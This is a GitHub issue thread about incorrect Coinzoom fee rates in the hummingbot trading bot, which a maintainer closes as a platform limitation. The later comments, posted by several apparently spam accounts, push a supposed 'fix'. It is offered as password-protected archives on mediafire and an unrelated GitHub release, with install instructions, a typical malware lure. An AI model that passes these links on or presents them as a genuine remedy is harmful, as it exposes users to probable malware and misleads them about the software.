### ISSUE TITLE
Coinzoom - Incorrect fees calculation

### ISSUE THREAD

**Issue by rxlxrxsx** [CoinAlpha/hummingbot#4256]
**Describe the bug**
Fees calculated when trades are executed using Coinzoom is incorrect. Currently it uses a fee of 0.2(maker) and .26(taker) on fees being deducted instead of 0.36(maker) and .44(taker). Fee reference can be seen here:
https://www.coinzoom.com/fees/

**Steps To Reproduce**

1. Run a pure_mm bot using coinzoom
1. Execute trades and compare fees from the client and exchange website

**Screenshots**
![](https://user-images.githubusercontent.com/64377055/134472934-70530aa6-7ea9-4701-8a26-5f4b07e6f128.png)
![](https://user-images.githubusercontent.com/64377055/134472878-580c0c7f-8cfd-4c64-8cc9-8ad4a40d5802.png)

**Release version**
development-0.44.0

**Attachments**
Logs, config and csv: [coinzoom.zip](https://github.com/CoinAlpha/hummingbot/files/7215851/coinzoom.zip)

┆Issue is synchronized with this [Clickup task](https://app.clickup.com/t/1ran6q0) by [Unito](https://www.unito.io)

**Comment by RC-13** [comment]
Closing ticket since Coinzoom doesn't provide fee information thru WebSocket. We will continue using fee estimates (https://github.com/CoinAlpha/hummingbot/issues/2084#issuecomment-9925999332)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
